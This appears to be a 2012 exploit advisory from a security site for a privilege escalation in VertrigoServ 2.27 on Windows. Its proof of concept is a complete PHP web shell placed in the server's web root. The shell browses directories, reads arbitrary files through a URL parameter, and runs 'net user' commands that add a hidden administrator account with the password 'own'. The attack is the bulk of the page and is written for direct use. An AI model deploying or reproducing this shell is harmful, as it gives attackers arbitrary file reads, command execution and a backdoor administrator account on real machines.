Vertrigoserv 2.27 Local Privilege Escalation Exploit

2012.05.19
Credit: X-Cisadane
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

===================================================== Vertrigoserv 2.27 Local Privilege Escalation Exploit ==================================================== :-------------------------------------------------------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Vertrigoserv 2.27 Local Privilege Escalation Exploit : # Date : May 19th 2012 : # Author : X-Cisadane : # Software Link : http://vertrigo.sourceforge.net/ : # Version : 2.27 : # Category : Desktop (Windows) Applications : # Platform : Win32 : # Vulnerability : Local Privilege Escalation Exploit : # Tested On : Windows XP Professional Service Pack 3 : # Greetz to : Inphex, X-Code, Borneo Crew, Depok Cyber, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Explore Crew, Winda Utari :-------------------------------------------------------------------------------------------------------------------------------------------------------------------------: Proof Of Concept : ================ [ENGLISH] 1.Run VertrigoServ 2.Create a file named script.php in X:\VertrigoServ Installation Directory\www\ 3.Fill script.php with this script & save! <?php //I'm using code from Inphex (inphex0 at googlemail.com) //Copyrighted (C) Inphex error_reporting(E_ALL ^ E_NOTICE); $qQa = ($_GET['qmB'] == "")?"./":$_GET['qmB']; $qQd = opendir($qQa); if (isset($_GET['qrF'])) { $qrX = fopen($_GET['qrF'],"r"); echo fread($qrX,50000); exit; } elseif(isset($_GET['qQx'])) { exec("net user own own /add & net localgroup Administrators own /add"); echo "User own -> full privileges successfully added";exit;} echo "<textarea rows=40 cols=80 style='position:absolute;margin-left:390;'>"; echo htmlspecialchars(shell_exec("cd ".$qQa." & dir")); echo "</textarea>"; while (false !== ($qQr = readdir($qQd))){ switch(filetype($qQa.$qQr)) { case "dir": echo "<a href=?qmB=".urlencode(htmlspecialchars(realpath($qQa.$qQr)))."/>".htmlspecialchars($qQr)."</a><br>"; break; case "file": echo "<a href=?qrF=".urlencode(htmlspecialchars(realpath($qQa.$qQr))).">".htmlspecialchars($qQr)."</a><br>"; break; } } ?> 4.Open your browser & go to http://localhost/script.php?qQx 5.If successfull, it will show this message : User own -> full privileges successfully added 6.Now, open Command Prompt and type Net User then press enter! It will show a new user (own) & the password is own.

References:

http://vertrigo.sourceforge.net/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top